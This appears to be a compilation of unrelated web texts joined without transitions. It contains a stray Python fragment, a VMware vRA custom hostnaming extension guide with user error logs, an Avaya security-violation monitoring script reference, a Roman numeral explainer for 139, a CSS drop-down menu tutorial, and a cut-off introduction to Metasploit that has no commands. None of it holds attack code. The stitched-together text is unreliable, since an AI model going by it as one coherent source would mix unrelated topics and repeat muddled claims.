So yes, Metasploit is extremely powerful! Use it wisely and you will obtain near limitless power, but don’t get dependant on it 🙂
By the way, if you are confused about the difference between exploits and payloads, I made the following article:
Exploits and Payloads Essentials
Remember that using msfvenom and the Metasploit Framework for unauthorized or malicious activities is illegal and unethical. Always ensure you have proper authorization and are using these tools for legitimate security testing or educational purposes. With that out of the way, let's get started!
Install Metasploit
Metasploit is probably already installed on your system if you are using Kali Linux. If not, it is quickly installed by running the following command:
sudo apt install metasploit-framework
After installation, it’s crucial to keep Metasploit up-to-date to access the latest exploits and modules. Open a terminal or command prompt and run:
sudo apt update && sudo apt install metasploit-framework
Now we are ready to start up Metasploit. We will launch a command-line interface called the Metasploit Console. To start it, simply run:
msfconsole
Basic commands
You now have entered msfconsole, a command-line interface for the framework.
It is important to note that there is also a paid GUI version with greater functionality.
Here are some essential commands which we will cover during this artcle:
• help: Displays a list of available commands
• search <keyword>: Searches for modules based on a keyword.
• use <module>: Selects a module for use.
• show options: Displays the options available for the selected module.
• set <option> <value>: Sets the value of an option for the selected module.
• exploit or run: Executes the selected module with the configured options.
That’s fine and all, but most of these commands mention modules. What are these? I’m glad you asked.
Modules
Metasploit is organized into various modules, including exploit modules, auxiliary modules, and post-exploitation modules.
It makes the most sense to think of these modules as a bundling of scripts divided into different categories. The exploit module for example, includes so-called proof-of-concept (POCs) that can be used to exploit existing vulnerabilities in a largely automated manner.
Searching for modules
Most of the times when you start msfconsole, you will start by using the search command, to find a specific module. (use help search if you want more help).
While you could just add a simple command like search eternal blue, this could theoretically return hundreds of modules since there are so many modules available in Metasploit. That's why I recommend using search operators.
The following are search operators that are available:
• name
• path
• platform
• type
• app
• author
• cve
• bid
• osvdb
Of particular interest is the module type. Modules can have different types, and this is a major way to group them. The following types are available:
Type Description
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities.
Encoders Ensure that payloads are intact to their destination.
Exploit Defined as modules that exploit a vulnerability that will allow for the payload delivery.
NOPs (No Operation code) Keep the payload sizes consistent across exploit attempts.
Payload Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
Plugin Additional scripts can be integrated within an assessment with msfconsole and coexist.
Post Wide array of modules to gather information, pivot deeper, etc.
These search operators narrow the results you get from your search command. Examples of this are for example:
search platform:Windows
search type:exploit eternal blue
This will save you a lot of time!
Use-ing a module (selecting)
Once you’ve found a relevant exploit module, use the use command to select it:
use exploit/windows/smb/ms08_067_netapi
An alternative is to select the module by the specific id found in the search results:
use 7
Now that you have loaded a module, you can use the info command to read more about the selected module.
To proceed it is time to set the relevant options.
Setting options of a module
Use the show options command to see the available options for the selected module. Note, that these options can differ a lot between modules, so have a look at the options after selecting a new module.
When you found an option to change, you can use the set command to configure the necessary options for the selected exploit module, such as the target IP address and payload.
Parameters you will often use are:
• RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
• RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
• LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
• LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine.
Here is an example:
set RHOSTS 10.10.25.71
set LPORT 4141
Running a module
Finally, execute the exploit using the exploit or run command.
Metasploit will attempt to exploit the target system based on your configurations. If you are lucky you will gain a shell on the target system. But often we need to adjust more settings. Let’s discuss other important Metasploit concepts now, such as targets, exploits, and Meterpreter shells..
Targets
Targets relate to the unique operation system identifier that will be targeted by the module. When you select a different target, the selected exploit module will adapt to run on that particular target OS. Some examples of when this is relevant is when some exploits need to specify the 64 or 32 bit architecture. Another example is that some exploits support several Windows versions. If you know this about the target, the chance of success will be higher.
To find out which targets are available for the selected exploit, we can run:
show targets
The show targets command issued within an exploit module view will display all available vulnerable targets for that specific exploit.
Generally, Metasploit is smart enough to set the right target, but in some cases it is a good idea to manually adjust it based on what you have learned about the target system.
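For example, to pick a target manually you can set it by the index number reported by show targets (the value 1 below is just a placeholder; use whichever index matches your target system):

set target 1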
Payloads
Once you’ve set the exploit options, you can choose the payload you want to use. There are two different type of payloads in Metasploit:
• Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
• Staged: Staged payloads will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small, making these payloads less likely to be discovered.
Use the show payloads command to list available payloads for the selected exploit module. You might want to know if a payload is staged or single. If we look at windows/shell/reverse_tcp and windows/shell_reverse_tcp, the one with the forward slash indicates that it is a "staged" payload, while the one with the underscore means it's "single".
Once you have found one you like you can use the set payload command followed by the name of the payload you want to use.
set payload windows/meterpreter/reverse_tcp
Or you can select the payload by using the id shown in the show payloads results.
set payload 16
After setting the payload we have to set some options again.
For the payload part, we will need to set the following two parameters:
LHOST: The attacker’s IP address
LPORT: Listener port on attacker’s machine
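As a quick illustration (the IP address and port below are placeholder values for your own attacking machine):

set LHOST 10.10.14.5
set LPORT 4444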
When you are done setting up you can once again run the exploit. Hopefully you will get a shell. Depending on the type of payload, you might get a meterpreter shell. A what you say?
Meterpreter Payload
Before we move on, an important concept to cover is the Meterpreter payload. This is a versatile payload that utilizes DLL injection to establish a stable and covert connection with the victim host. It is designed to be persistent across reboots or system changes, while remaining difficult to detect through conventional forensic techniques. Meterpreter operates entirely in the host’s memory, leaving no traces on the hard drive. Furthermore, it allows for dynamic loading and unloading of scripts and plugins as needed.
Upon execution of the Meterpreter payload, a new session is created, spawning the Meterpreter interface. This interface resembles the msfconsole interface, but its commands are focused on the target system that the payload has “infected.” It feels like a regular shell, but you should see it as a shell on steroids. It’s extremely powerful.
To give an idea on which commands you can use, here are the core commands in the output of the help menu:
Core commands
• background: Backgrounds the current session
• exit: Terminate the Meterpreter session
• guid: Get the session GUID (Globally Unique Identifier)
• help: Displays the help menu
• info: Displays information about a Post module
• irb: Opens an interactive Ruby shell on the current session
• load: Loads one or more Meterpreter extensions
• migrate: Allows you to migrate Meterpreter to another process
• run: Executes a Meterpreter script or Post module
• sessions: Quickly switch to another session
File system commands
• cd: Will change directory
• ls: Will list files in the current directory (dir will also work)
• pwd: Prints the current working directory
• edit: will allow you to edit a file
• cat: Will show the contents of a file to the screen
• rm: Will delete the specified file
• search: Will search for files
• upload: Will upload a file or directory
• download: Will download a file or directory
Networking commands
• arp: Displays the host ARP (Address Resolution Protocol) cache
• ifconfig: Displays network interfaces available on the target system
• netstat: Displays the network connections
• portfwd: Forwards a local port to a remote service
• route: Allows you to view and modify the routing table
System commands
• clearev: Clears the event logs
• execute: Executes a command
• getpid: Shows the current process identifier
• getuid: Shows the user that Meterpreter is running as
• kill: Terminates a process
• pkill: Terminates processes by name
• ps: Lists running processes
• reboot: Reboots the remote computer
• shell: Drops into a system command shell
• shutdown: Shuts down the remote computer
• sysinfo: Gets information about the remote system, such as OS
Others Commands
• idletime: Returns the number of seconds the remote user has been idle
• keyscan_dump: Dumps the keystroke buffer
• keyscan_start: Starts capturing keystrokes
• keyscan_stop: Stops capturing keystrokes
• screenshare: Allows you to watch the remote user’s desktop in real time
• screenshot: Grabs a screenshot of the interactive desktop
• record_mic: Records audio from the default microphone for X seconds
• webcam_chat: Starts a video chat
• webcam_list: Lists webcams
• webcam_snap: Takes a snapshot from the specified webcam
• webcam_stream: Plays a video stream from the specified webcam
• getsystem: Attempts to elevate your privilege to that of local system
• hashdump: Dumps the contents of the SAM database
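To give a feel for how these fit together, a typical first few commands once you land in a Meterpreter session might look like this (output omitted; all of these commands are described in the lists above):

sysinfo
getuid
hashdump
background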
Sessions & Post-Exploitation
If the exploitation is successful, you’ll enter a post-exploitation phase. You can use various post-exploitation modules to gather information, maintain access, and perform additional actions on the compromised system.
It is time to use some post-exploitation commands. Start by backgrounding your shell (Control-Z). Take a look at the session ID by entering sessions -l.
Listing the running sessions
Search for the right module by entering search enum. This came up:
This sounds interesting. Load it and set the session option to 1.
Now, you can run the post exploitation module which will run on the previously established session. You will now be able to run different actions that will increase your control over the system.
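The exact module from the search results isn't shown here, but loading and running any post module against an existing session follows the same pattern. As an illustration (the module below is just one common enumeration example, and the session ID is a placeholder):

use post/windows/gather/enum_logged_on_users
set SESSION 1
run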
Encoders
Encoders are a feature I briefly want to mention, although perhaps not very essential at this point in our journey. Encoders are tools or techniques used to transform data in a way that makes it more difficult for security systems, such as intrusion detection systems (IDS) or antivirus software, to detect and block malicious payloads. Encoders are commonly employed when trying to evade detection during the exploitation phase of a penetration test or a real-world attack.
Encoders transform the original payload, which is typically shellcode or other forms of malicious code, into an altered form that still accomplishes the same objective but is no longer easily recognizable by signature-based security systems.
We can list the available encoders with show encoders.
Like the available payloads, these are automatically filtered according to the exploit module only to display the compatible ones.
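As a brief illustration (msfvenom itself is covered in the next section, and the IP, port and filename here are placeholders), a payload can be run through an encoder such as x86/shikata_ga_nai for several iterations when it is generated:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe

Keep in mind that encoding is only a basic evasion technique, and modern antivirus engines often still detect encoded payloads.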
MSFVenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads. Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats and for many different target systems.
Why is this even necessary? While msfconsole is perfect if you have a network connection to the target, sometimes you need to manually upload a payload to a server, or send it with an email. For this msfvenom is the right tool.
How to create a payload
When using msfvenom the general exploit steps are:
1. Generate the payload using MSFvenom
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. A general payload is created like so:
msfvenom -p <payload> [options]
<payload>: Specify the payload you want to generate. This can be any payload supported by Metasploit, such as windows/meterpreter/reverse_tcp for a Windows Meterpreter reverse shell.
Depending on the payload and its specific requirements, you’ll need to provide additional options. These options vary depending on the payload, but common ones include:
• -f <format>: Specify the output format for the payload (e.g., exe, dll, python, bash).
• -o <output_file>: Specify the filename for the generated payload.
• LHOST=<listener_IP>: Set the IP address of the listener (your attacking machine).
• LPORT=<listener_port>: Set the port number on which the payload will connect back to your listener.
Example payload commands:
Based on the target system’s configuration (operating system, installed webserver, interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use, depending on the target system:
• Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
• PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
• ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
• Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
2. Setup a listener:
To catch the incoming connection from the generated payload, you’ll need to set up a listener using the Metasploit Framework. You can do this for example by using the exploit/multi/handler.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacker IP>
set LPORT <Attacker listening port>
exploit
3. Execute the Payload: Now that you have the payload and the listener set up, you can deliver the payload to the target system. The method of delivery will depend on your specific scenario, but common techniques include email attachments, social engineering, or exploiting vulnerabilities.
4. Session: If the payload execution is successful, you should see a Meterpreter session established in your msfconsole session. You can then interact with the compromised system using various Meterpreter commands.
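If you background the Meterpreter session, you can list the open sessions and re-enter one (assuming the session ID is 1) with the standard msfconsole commands:
sessions -l
sessions -i 1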
Conclusion
Metasploit is a powerful tool for ethical hacking and penetration testing, but it should always be used responsibly and with proper authorization. This beginner’s guide provides a foundation for getting started with Metasploit, but there is much more to explore as you gain experience. Continuously learn and practice to become proficient in using this valuable cybersecurity tool.
|
__label__pos
| 0.513169 |
Noelle.dev
jq Cheat Sheet
How to perform common operations on JSON documents.
jq is a very useful tool for parsing and manipulating JSON documents on the command line. For a comprehensive reference on all the features, see the jq manual.
The following examples will use this data.json document as input:
{
"name": "Julia Sommers",
"items": ["car", "horse", "laptop"],
"friends": [
{ "name": "Amanda Brush", "pet": "dog" },
{ "name": "January Stiles", "pet": "bird" },
{ "name": "Grace Rose", "pet": "bird" }
]
}
Identity
jq '.' data.json
{
"name": "Julia Sommers",
"items": ["car", "horse", "laptop"],
"friends": [
{
"name": "Amanda Brush",
"pet": "dog"
},
{
"name": "January Stiles",
"pet": "bird"
},
{
"name": "Grace Rose",
"pet": "bird"
}
]
}
Get single value from document
jq --raw-output '.name' data.json
Julia Sommers
Get the first N items of an array
jq '.items[:2]' data.json
["car", "horse"]
Map an array
jq '[.friends[] | .name]' data.json
["Amanda Brush", "January Stiles", "Grace Rose"]
Filter an array
jq '[.friends[] | select(.pet=="bird")]' data.json
[
{
"name": "January Stiles",
"pet": "bird"
},
{
"name": "Grace Rose",
"pet": "bird"
}
]
Reduce an array
jq --raw-output 'reduce .items[] as $item (""; . + $item)' data.json
carhorselaptop
Recursively get values from a key name
Return all the values associated with the name key, recursively.
jq --raw-output 'recurse | objects | .name' data.json
Julia Sommers
Amanda Brush
January Stiles
Grace Rose
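One more filter that often comes in handy (not part of the list above): the built-in length function, which counts the elements of an array.
jq '.items | length' data.json
3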
|
__label__pos
| 0.924081 |
Nibble to Kilobit - 283 Nibble to kbit Conversion
High Precision Data Unit Conversion
RESULT ( Nibble → Kilobit ) :
283 Nibble = 1.132 kbit
Calculated as → 283 x 4 / 1000 (detailed steps below)
Nibble to kbit - Conversion Formula and Steps
Nibble and Kilobit are units of digital information used to measure storage capacity and data transfer rate. Nibble is one of the very basic digital unit where as Kilobit is a decimal unit. One Nibble is equal to 4 bits. One Kilobit is equal to 1000 bits. There are 250 Nibbles in one Kilobit.
Source Data Unit: Nibble — equal to 4 bits (basic unit)
Target Data Unit: Kilobit (kbit) — equal to 1000 bits (decimal unit)
The formula of converting the Nibble to Kilobit is represented as follows :
kbit = Nibble x 4 / 1000
Now let us apply the above formula and, write down the steps to convert from Nibble to Kilobit (kbit). This way, we can try to simplify and reduce to an easy to apply formula.
FORMULA
Kilobit = Nibble x 4 / 1000
STEP 1
Kilobit = Nibble x 0.004
If we apply the above Formula and steps, conversion from 283 Nibble to kbit, will be processed as below.
1. = 283 x 4 / 1000
2. = 283 x 0.004
3. = 1.132
4. i.e. 283 Nibble is equal to 1.132 kbit.
(Result rounded off to 40 decimal positions.)
Conversion Units
Definition : Nibble
A Nibble is a unit of digital information that consists of 4 bits. It is half of a byte and can represent a single hexadecimal digit. It is used in computer memory and data storage and sometimes used as a basic unit of data transfer in certain computer architectures.
Definition : Kilobit
A Kilobit (kb or kbit) is a unit of digital information that is equal to 1000 bits. It is commonly used to express data transfer speeds, such as the speed of an internet connection and to measure the size of a file. In the context of data storage and memory, the binary-based unit of Kibibit (Kibit) is used instead.
Excel Formula to convert from Nibble to kbit
Apply the formula as shown below to convert from 283 Nibble to Kilobit.
     A         B
1    Nibble    Kilobit (kbit)
2    283       =A2 * 0.004
Download - Excel Template for Nibble to Kilobit Conversion
If you want to perform bulk conversion locally in your system, then download and make use of above Excel template.
Python Code for Nibble to kbit Conversion
You can use below code to convert any value in Nibble to Kilobit in Python.
nibble = int(input("Enter Nibble: "))
kilobit = nibble * 4 / 1000
print("{} Nibble = {} Kilobit".format(nibble,kilobit))
The first line of code will prompt the user to enter the Nibble value as input. The value in Kilobit is calculated on the next line, and the code on the third line will display the result.
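As a quick illustration (assuming Python 3, where / performs true division), entering 283 would print:
Enter Nibble: 283
283 Nibble = 1.132 Kilobit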
|
__label__pos
| 0.82261 |
Python | Uploading images in Django
In most of the websites, we often deal with media data such as images, files etc. In django we can deal with the images with the help of model field which is ImageField.
In this article, we have created the app image_app in a sample project named image_upload.
The very first step is to add the code below to the settings.py file (it uses the os module, so make sure settings.py has import os at the top).
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
MEDIA_ROOT is the filesystem path on the server where uploaded files are stored.
MEDIA_URL is the reference URL the browser uses to access the files over HTTP.
In the urls.py we should edit the configuration like this
from django.conf import settings
from django.conf.urls.static import static
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
A sample models.py should look like this; in it we have created a Hotel model which consists of the hotel name and its image.
In this project we are taking the hotel name and its image from the user for a hotel booking website.
# models.py
from django.db import models

class Hotel(models.Model):
    name = models.CharField(max_length=50)
    hotel_Main_Img = models.ImageField(upload_to='images/')
Here upload_to specifies the directory in which the images should reside. By default Django creates that directory under the media directory, which is created automatically when we upload an image; there is no need to create the media directory explicitly.
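Note that ImageField depends on the Pillow imaging library; if it is not installed yet, you will likely need to run something like:
pip install Pillow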
We have to create a forms.py file under image_app, here we are dealing with model form to make content easier to understand.
# forms.py
from django import forms
from .models import *
class HotelForm(forms.ModelForm):
class Meta:
model = Hotel
fields = ['name', 'hotel_Main_Img']
Django will implicitly handle the form validation without us declaring it explicitly in the script, and it will create the corresponding form fields on the page according to the model fields we specified in models.py.
This is the advantage of a model form.
Now create a templates directory under image_app and, inside it, an HTML file for uploading the images. The HTML file should look like this.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hotel_image</title>
</head>
<body>
<form method = "post" enctype="multipart/form-data">
{% csrf_token %}
{{ form.as_p }}
<button type="submit">Upload</button>
</form>
</body>
</html>
When making a POST request, we have to encode the data that forms the body of the request in some way. So, we have to specify the encoding format in the form tag. multipart/form-data is significantly more complicated but it allows entire files to be included in the data.
The csrf_token is for protection against Cross Site Request Forgeries.
form.as_p simply wraps all the elements in HTML paragraph tags. The advantage is not having to write a loop in the template to explicitly add HTML to surround each title and field.
In the views.py under image_app in that we have to write a view for taking requests from user and gives back some html page.
from django.http import HttpResponse
from django.shortcuts import render, redirect
from .forms import *
# Create your views here.
def hotel_image_view(request):
if request.method == 'POST':
form = HotelForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('success')
else:
form = HotelForm()
return render(request, 'hotel_image_form.html', {'form' : form})
def success(request):
return HttpResponse('successfully uploaded')
Whenever hotel_image_view is hit with a POST request, we create an instance of the model form with form = HotelForm(request.POST, request.FILES); the uploaded image is available under request.FILES. If the form is valid, we save it into the database and redirect to the success URL, which indicates that the image was uploaded successfully. If the method is not POST, we render the HTML template we created.
urls.py will look like this –
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .views import *
urlpatterns = [
path('image_upload', hotel_image_view, name = 'image_upload'),
path('success', success, name = 'success'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
Now make the migrations and run the server.
This is how it looks when we open the URL in the browser.
After uploading the image, it will show "successfully uploaded".
A media directory will now be created in the project directory, with an images directory inside it where the image is stored. Here is the final result.
Final output stored in the database
Now we can write a view for accessing those images, for simplicity let’s take example with one image and it is also applicable for many images.
# Python program to view
# for displaying images
def display_hotel_images(request):
    if request.method == 'GET':
        # getting all the objects of hotel.
        Hotels = Hotel.objects.all()
        return render(request, 'display_hotel_images.html',
                      {'hotel_images': Hotels})
A sample html file template for displaying images.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hotel Images</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
{% for hotel in hotel_images %}
<div class="col-md-4">
{{ hotel.name }}
<img src="{{ hotel.hotel_Main_Img.url }}" class="img-responsive" style="width: 100%; float: left; margin-right: 10px;" />
</div>
{% endfor %}
</body>
</html>
Insert the url path in the urls.py file
# urls.py
path('hotel_images', display_hotel_images, name = 'hotel_images'),
Here is the final view in the browser when we access the image.
Last Updated on October 28, 2021 by admin
|
__label__pos
| 0.633641 |
Bug #34613 SQL mode missing in mysql.proc.sql_mode
Submitted: 15 Feb 2008 22:56    Modified: 15 Feb 2008 23:30
Reporter: Markus Popp
Status: Duplicate
Category: MySQL Server    Severity: S3 (Non-critical)
Version: 5.1.23 (others?)    OS: Any
Assigned to:    CPU Architecture: Any
[15 Feb 2008 22:56] Markus Popp
Description:
The SQL mode NO_ENGINE_SUBSTITUTION is missing in the field sql_mode of the mysql.proc table:
mysql> show create table proc\G
*************************** 1. row ***************************
Table: proc
Create Table: CREATE TABLE `proc` (
`db` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`name` char(64) NOT NULL DEFAULT '',
`type` enum('FUNCTION','PROCEDURE') NOT NULL,
`specific_name` char(64) NOT NULL DEFAULT '',
`language` enum('SQL') NOT NULL DEFAULT 'SQL',
`sql_data_access` enum('CONTAINS_SQL','NO_SQL','READS_SQL_DATA','MODIFIES_SQL_DATA') NOT NULL DEFAULT 'CONTAINS_SQL',
`is_deterministic` enum('YES','NO') NOT NULL DEFAULT 'NO',
`security_type` enum('INVOKER','DEFINER') NOT NULL DEFAULT 'DEFINER',
`param_list` blob NOT NULL,
`returns` longblob NOT NULL,
`body` longblob NOT NULL,
`definer` char(77) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
`modified` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`sql_mode` set('REAL_AS_FLOAT','PIPES_AS_CONCAT','ANSI_QUOTES','IGNORE_SPACE','NOT_USED','ONLY_FULL_GROUP_BY','NO_UNSIGNED_SUBTRACTION','NO_DIR_IN_CREATE','POSTGRESQL','ORACLE','MSSQL','DB2','MAXDB','NO_KEY_OPTIONS','NO_TABLE_OPTIONS','NO_FIELD_OPTIONS','MYSQL323','MYSQL40','ANSI','NO_AUTO_VALUE_ON_ZERO','NO_BACKSLASH_ESCAPES','STRICT_TRANS_TABLES','STRICT_ALL_TABLES','NO_ZERO_IN_DATE','NO_ZERO_DATE','INVALID_DATES','ERROR_FOR_DIVISION_BY_ZERO','TRADITIONAL','NO_AUTO_CREATE_USER','HIGH_NOT_PRECEDENCE') NOT NULL DEFAULT '',
`comment` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`character_set_client` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`collation_connection` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`db_collation` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`body_utf8` longblob,
PRIMARY KEY (`db`,`name`,`type`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Stored Procedures'
1 row in set (0.01 sec)
It's missing in share/mysql_fix_privilege_tables.sql as well:
...
CREATE TABLE IF NOT EXISTS proc (db char(64) collate utf8_bin DEFAULT '' NOT NULL, name char(64) DEFAULT '' NOT NULL, type enum('FUNCTION','PROCEDURE') NOT NULL, specific_name char(64) DEFAULT '' NOT NULL, language enum('SQL') DEFAULT 'SQL' NOT NULL, sql_data_access enum( 'CONTAINS_SQL', 'NO_SQL', 'READS_SQL_DATA', 'MODIFIES_SQL_DATA') DEFAULT 'CONTAINS_SQL' NOT NULL, is_deterministic enum('YES','NO') DEFAULT 'NO' NOT NULL, security_type enum('INVOKER','DEFINER') DEFAULT 'DEFINER' NOT NULL, param_list blob NOT NULL, returns longblob DEFAULT '' NOT NULL, body longblob NOT NULL, definer char(77) collate utf8_bin DEFAULT '' NOT NULL, created timestamp, modified timestamp, sql_mode set( 'REAL_AS_FLOAT', 'PIPES_AS_CONCAT', 'ANSI_QUOTES', 'IGNORE_SPACE', 'NOT_USED', 'ONLY_FULL_GROUP_BY', 'NO_UNSIGNED_SUBTRACTION', 'NO_DIR_IN_CREATE', 'POSTGRESQL', 'ORACLE', 'MSSQL', 'DB2', 'MAXDB', 'NO_KEY_OPTIONS', 'NO_TABLE_OPTIONS', 'NO_FIELD_OPTIONS', 'MYSQL323', 'MYSQL40', 'ANSI', 'NO_AUTO_VALUE_ON_ZERO', 'NO_BACKSLASH_ESCAPES', 'STRICT_TRANS_TABLES', 'STRICT_ALL_TABLES', 'NO_ZERO_IN_DATE', 'NO_ZERO_DATE', 'INVALID_DATES', 'ERROR_FOR_DIVISION_BY_ZERO', 'TRADITIONAL', 'NO_AUTO_CREATE_USER', 'HIGH_NOT_PRECEDENCE') DEFAULT '' NOT NULL, comment char(64) collate utf8_bin DEFAULT '' NOT NULL, character_set_client char(32) collate utf8_bin, collation_connection char(32) collate utf8_bin, db_collation char(32) collate utf8_bin, body_utf8 longblob, PRIMARY KEY (db,name,type)) engine=MyISAM character set utf8 comment='Stored Procedures';
...
How to repeat:
On a fresh installation of MySQL 5.1.23, run the command SHOW CREATE TABLE mysql.proc.
Here's an example where this problem shows up:
mysql> SELECT @@sql_mode;
+----------------------------------------------------------------+
| @@sql_mode |
+----------------------------------------------------------------+
| STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION |
+----------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> CREATE FUNCTION fn_test(xx INT(4)) RETURNS INT(4) RETURN xx;
ERROR 1607 (HY000): Cannot create stored routine `fn_test`. Check warnings
mysql> SHOW WARNINGS;
+---------+------+--------------------------------------------------------+
| Level | Code | Message |
+---------+------+--------------------------------------------------------+
| Warning | 1265 | Data truncated for column 'sql_mode' at row 1 |
| Error | 1607 | Cannot create stored routine `fn_test`. Check warnings |
+---------+------+--------------------------------------------------------+
2 rows in set (0.00 sec)
mysql> SET @@sql_mode := '';
Query OK, 0 rows affected (0.00 sec)
mysql> CREATE FUNCTION fn_test(xx INT(4)) RETURNS INT(4) RETURN xx;
Query OK, 0 rows affected (0.00 sec)
mysql> SELECT fn_test(5);
+------------+
| fn_test(5) |
+------------+
| 5 |
+------------+
1 row in set (0.00 sec)
Suggested fix:
Add NO_ENGINE_SUBSTITUTION as one of values in the SET list.
[15 Feb 2008 23:30] Davi Arnaut
This is a duplicate of Bug#32633. Fixed in 5.1.24 (coming soon).
|
__label__pos
| 0.932429 |
Wednesday, November 12, 2008
Public Methods Should be Like Stories
I believe that most developers try to write code that is as readable as possible. I will try to explain how I try to achieve this. From my point of view, one of the most important things is to write public methods as stories. This means that when somebody reads your public method, its implementation should tell, through sentence-like method calls, what it tries to achieve. This way one can concentrate on the business logic the method implements and not on how it is implemented.
So I try to follow a few short rules:
• Instead of code within a public method, call a number of private methods
• Avoid loops
• Try to minimize if statements
• If a private method is hard to read, apply these rules to the private method as well
Following these rules, your public methods are easy to understand, and they are easier to test if you are doing black-box testing. What may happen to your code is that you end up with a number of private methods if you apply these rules to the private methods as well. But I don't consider this to be bad, because in that case even the private methods are easy to understand, so if somebody has to change your code it will be easier.
As an opinion is easier to understand through an example, I will show one method from my http://www.flexiblefeeds.com site.
Although the example is in Groovy, I believe it will be easily understandable for all developers. Currently the method looks like this:
def currentUserVote(Long articleId, boolean upVoting) {
boolean canVote = canCurrentUserVote(articleId)
if (!canVote) {
return
}
vote(articleId, upVoting)
registerVoting(articleId)
}
I believe it is easy to understand what the method does from the code itself. But to be sure: first it is checked whether the current user can vote. If the user cannot vote, the method returns. If the user can vote, the vote is cast and then the voting is registered.
Now let us see how this method would look if all the code were embedded directly in the public method.
def currentUserVote(Long articleId, boolean upVoting) {
// decide if user can vote
if (!loggedInUserIsAdministrator()) {
return
}
// logged in user can vote if he didn't voted
if (userIsLoggedIn()) {
return !voted(loggedInUser().id, articleId)
}
// not logged in user can vote if he didn't voted and data is stored in session
if(votedInSession(articleId)) {
return
}
// perform voting
try {
String sql
if (upVoting) {
sql = "SQL_FOR_UP_VOTING"
} else {
sql = "SQL_FOR_DOWN_VOTING"
}
Article.executeUpdate(sql, [id:articleId])
} catch (Exception ex) {
log.error("Failed to vote up for article ${articleId}", ex)
throw ex;
}
// register voting
if (loggedInUser()) {
def a = Article.get(articleId)
try {
ArticleVoting voting = new ArticleVoting(user:loggedInUser(), article:a)
voting.save(flush:true)
} catch (Exception ex) {
log.error(ex)
throw ex;
}
} else {
if (!session().votedIds) {
def votedIds = [] as Set
session().votedIds = votedIds
}
session().votedIds.add(articleId)
}
}
Having a look at this method, you can notice that it is still possible to understand what the method does. But besides understanding what the method is doing, you are also reading all of its code. It means you are doing two things at the same time: trying to understand the business logic and trying to understand how that business logic is achieved.
Therefore in all such cases I would recommend refactoring the code and extracting parts of the public method into private methods, as sketched below.
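For illustration only (this sketch is not from the original post), the extracted private helpers behind the short public method could look roughly like this, reusing the logic from the long version above; a canCurrentUserVote() helper would wrap the three permission checks in the same way:
private void vote(Long articleId, boolean upVoting) {
    // pick the statement that increments or decrements the score
    String sql = upVoting ? "SQL_FOR_UP_VOTING" : "SQL_FOR_DOWN_VOTING"
    Article.executeUpdate(sql, [id:articleId])
}

private void registerVoting(Long articleId) {
    if (loggedInUser()) {
        // remember the vote in the database for logged in users
        new ArticleVoting(user:loggedInUser(), article:Article.get(articleId)).save(flush:true)
    } else {
        // remember the vote in the HTTP session for anonymous users
        if (!session().votedIds) {
            session().votedIds = [] as Set
        }
        session().votedIds.add(articleId)
    }
}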
1 comment:
Marcos Silva Pereira said...
You just give me an idea to my next coding dojo: something like (un|de)refactoring.
Kind Regards
|
__label__pos
| 0.998366 |
Rayrun
← Back to Discord Forum
why does running case switch between the two monitors to open the page?
optional518 posted in #help-playwright
When a computer is connected to two monitors, why does running case switch between the two monitors to open the page?
Is it possible to fix a certain monitor to open the page under test?
This thread is trying to answer question "Why does the browser switch between two monitors when opening a page with Playwright, and can a specific monitor be set to open the page?"
6 replies
My computer OS is macOS, on an M3 Pro MBP.
Playwright does not control where to open it
@skorp32: So which browser is opened is random behavior?
So which browser is opened is random behavior?
No, it's not random behavior. The Playwright browser behavior is determined by the configuration in the playwright.config.ts file
@samsuthen: But I don't have any configurations for which browser to open
But I don't have any configurations for which browser to open
refactoreric
Hi @optional518 , as far as I understand, you want to control /on which display/ the browser will open.
